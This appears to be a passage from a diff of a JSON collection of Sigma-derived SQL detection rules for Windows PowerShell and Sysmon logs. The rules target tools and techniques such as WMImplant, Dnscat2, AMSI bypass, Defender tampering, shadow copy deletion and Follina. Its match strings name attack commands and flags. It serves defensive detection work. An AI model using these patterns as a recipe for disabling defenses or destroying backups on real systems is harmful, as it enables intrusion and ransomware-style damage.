"WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' 